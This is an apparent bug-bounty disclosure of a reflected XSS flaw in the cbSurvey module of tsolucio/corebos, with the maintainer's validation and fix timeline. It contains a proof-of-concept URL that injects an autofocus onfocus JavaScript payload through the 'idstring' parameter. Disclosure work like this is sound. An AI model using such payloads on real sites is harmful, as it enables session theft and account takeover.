Reflected XSS in "cbSurvey" module in tsolucio/corebos

Valid

Reported on

Jun 26th 2022

Description

Reflected XSS due to bad sanitization of "idstring" parameter in cbSurvey module.

Proof of Concept

https://demo.corebos.com/index.php?module=cbSurvey&action=cbSurveyAjax&file=MassEdit&mode=ajax&idstring=" onfocus=javascript:alert(document.domain) type=txt autofocus="

Impact

Client side code execution, can lead to cookie stealing, account takeover....

We are processing your report and will contact the tsolucio/corebos team within 24 hours. a year ago

We have contacted a member of the tsolucio/corebos team and are waiting to hear back a year ago

We have sent a follow up to the tsolucio/corebos team. We will try again in 7 days. a year ago

We have sent a second follow up to the tsolucio/corebos team. We will try again in 10 days. a year ago

We have sent a third and final follow up to the tsolucio/corebos team. This report is now considered stale. a year ago

Joe Bordes validated this vulnerability a year ago

jhond0e has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

Joe Bordes marked this as fixed in 8.0 with commit 8d80af a year ago

Joe Bordes has been awarded the fix bounty

This vulnerability will not receive a CVE

to join this conversation